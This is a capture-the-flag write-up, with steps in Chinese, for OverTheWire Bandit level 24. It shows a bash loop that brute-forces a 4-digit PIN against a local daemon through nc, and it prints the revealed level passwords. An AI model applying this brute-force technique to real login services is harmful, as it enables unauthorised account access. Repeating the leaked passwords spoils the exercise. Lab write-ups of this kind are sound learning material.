[OverTheWire] Bandit Level 24 → Level 25
Level Goal
A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing. You do not need to create new connections each time
My Answer (Step by step)
- 連線到伺服器並登入
ssh bandit24@bandit.labs.overthewire.org -p 2220
- 透過 mktemp 指令產生暫存資料夾,並透過 cd 指令進入它
mktemp -d
cd /tmp/tmp.xs599rbycC
- 透過 vim, vi, nano 等指令產生稍後要執行的腳本檔,並透過 chmod 指令修改權限以便執行
nano a.sh
a.sh
#!/bin/bash
PWD='gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8'
for n in `seq 1 9999`;
do
echo "$PWD $n"
done | nc localhost 30002
chmod 777 -R /tmp/tmp.xs599rbycC
- 執行它,即可獲得 Level 25 密碼!
./a.sh
# Wrong! Please enter the correct current password and pincode. Try again.
# Wrong! Please enter the correct current password and pincode. Try again.
# Wrong! Please enter the correct current password and pincode. Try again.
# Wrong! Please enter the correct current password and pincode. Try again.
# Wrong! Please enter the correct current password and pincode. Try again.
# Correct!
# The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4
